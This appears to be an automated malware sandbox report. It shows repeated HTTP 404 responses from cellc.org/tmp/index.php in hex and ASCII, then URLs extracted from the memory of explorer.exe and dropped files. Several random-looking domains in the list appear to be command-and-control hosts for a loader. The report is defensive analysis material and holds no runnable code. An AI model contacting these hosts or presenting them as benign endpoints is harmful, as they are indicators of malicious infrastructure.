        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 02 May 2024 18:49:28 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 02 May 2024 18:49:30 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 02 May 2024 18:49:32 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 02 May 2024 18:49:34 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 02 May 2024 18:49:35 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 02 May 2024 18:49:36 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 02 May 2024 18:49:37 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 02 May 2024 18:49:38 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 02 May 2024 18:49:39 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/7.4.33Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
        Source: explorer.exe, 00000011.00000000.2276485731.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2867686407.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2870173011.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
        Source: explorer.exe, 00000011.00000002.2874485823.000000000CA42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cellc.org/
        Source: explorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cellc.org/B
        Source: explorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cellc.org/n
        Source: explorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cellc.org/p
        Source: explorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cellc.org/s
        Source: explorer.exe, 00000011.00000002.2873048284.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2874485823.000000000CA42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2864144911.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cellc.org/tmp/index.php
        Source: explorer.exe, 00000011.00000002.2873048284.000000000C964000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cellc.org/tmp/index.php&jz
        Source: explorer.exe, 00000011.00000002.2864144911.0000000001248000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cellc.org/tmp/index.php.ini
        Source: explorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cellc.org/tmp/index.php/m
        Source: explorer.exe, 00000011.00000002.2864144911.0000000001248000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cellc.org/tmp/index.phpZ
        Source: explorer.exe, 00000011.00000002.2864144911.0000000001248000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cellc.org/tmp/index.phpc
        Source: explorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cellc.org/tmp/index.phpngs
        Source: explorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cellc.org/tmp/index.phpngsA
        Source: explorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cellc.org/tmp/index.phpngsV
        Source: explorer.exe, 00000011.00000002.2873048284.000000000C964000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cellc.org/tmp/index.phprk
        Source: explorer.exe, 00000011.00000002.2874517414.000000000CADE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cellc.org:80/tmp/index.php
        Source: explorer.exe, 00000011.00000002.2874517414.000000000CADE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cellc.org:80/tmp/index.phpP
        Source: file.exeString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0Q
        Source: file.exe, 00000000.00000003.1602868846.0000000002826000.00000004.00000020.00020000.00000000.sdmp, Cube.0.dr, Existence.pif.1.dr, ssjhrji.17.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
        Source: file.exe, 00000000.00000003.1602868846.0000000002826000.00000004.00000020.00020000.00000000.sdmp, Cube.0.dr, Existence.pif.1.dr, ssjhrji.17.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
        Source: file.exe, 00000000.00000003.1602868846.0000000002826000.00000004.00000020.00020000.00000000.sdmp, Cube.0.dr, Existence.pif.1.dr, ssjhrji.17.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
        Source: file.exe, 00000000.00000003.1602868846.0000000002826000.00000004.00000020.00020000.00000000.sdmp, Cube.0.dr, Existence.pif.1.dr, ssjhrji.17.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
        Source: file.exe, 00000000.00000003.1602868846.0000000002826000.00000004.00000020.00020000.00000000.sdmp, Cube.0.dr, Existence.pif.1.dr, ssjhrji.17.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
        Source: explorer.exe, 00000011.00000000.2276485731.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2867686407.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2870173011.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
        Source: explorer.exe, 00000011.00000000.2276485731.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2867686407.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2870173011.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
        Source: file.exeString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0
        Source: file.exeString found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
        Source: explorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://dgqkmisxnbbni.net/
        Source: explorer.exe, 00000011.00000002.2874485823.000000000CA42000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://jyvmasmiydvgjuu.org/
        Source: explorer.exe, 00000011.00000002.2874485823.000000000CA42000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://jyvmasmiydvgjuu.org/s
        Source: explorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://khjhprifrxebx.net/
        Source: explorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://kxgtxppvhlmsi.net/
        Source: explorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ndsmsdugaunva.net/
        Source: explorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ndsmsdugaunva.net/gs
        Source: file.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: explorer.exe, 00000011.00000000.2276485731.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2867686407.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2870173011.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
        Source: explorer.exe, 00000011.00000000.2274432480.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2867686407.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
        Source: file.exe, 00000000.00000003.1602868846.0000000002826000.00000004.00000020.00020000.00000000.sdmp, Cube.0.dr, Existence.pif.1.dr, ssjhrji.17.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
        Source: file.exe, 00000000.00000003.1602868846.0000000002826000.00000004.00000020.00020000.00000000.sdmp, Cube.0.dr, Existence.pif.1.dr, ssjhrji.17.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
        Source: file.exe, 00000000.00000003.1602868846.0000000002826000.00000004.00000020.00020000.00000000.sdmp, Cube.0.dr, Existence.pif.1.dr, ssjhrji.17.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
        Source: file.exe, 00000000.00000003.1602868846.0000000002826000.00000004.00000020.00020000.00000000.sdmp, Cube.0.dr, Existence.pif.1.dr, ssjhrji.17.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
        Source: file.exeString found in binary or memory: http://ocsps.ssl.com0
        Source: ssjhrji, 00000013.00000002.2866115104.0000000003D96000.00000004.00000020.00020000.00000000.sdmp, ssjhrji, 00000013.00000003.2538497281.0000000003D96000.00000004.00000020.00020000.00000000.sdmp, ssjhrji, 00000013.00000003.2537510876.0000000003D96000.00000004.00000020.00020000.00000000.sdmp, ssjhrji, 00000013.00000003.2536709501.0000000003D97000.00000004.00000020.00020000.00000000.sdmp, ssjhrji, 00000013.00000003.2535914841.0000000003D97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purl.oen
        Source: explorer.exe, 00000011.00000002.2873048284.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://qkoxdyhgicus.org/
        Source: explorer.exe, 00000011.00000002.2874517414.000000000CAB6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://qkoxdyhgicus.org/gs
        Source: file.exeString found in binary or memory: http://s.symcb.com/universal-root.crl0
        Source: file.exeString found in binary or memory: http://s.symcd.com06
        Source: explorer.exe, 00000011.00000000.2277176998.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2870993996.00000000098A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.mi
        Source: explorer.exe, 00000011.00000000.2277176998.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2870993996.00000000098A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.micr
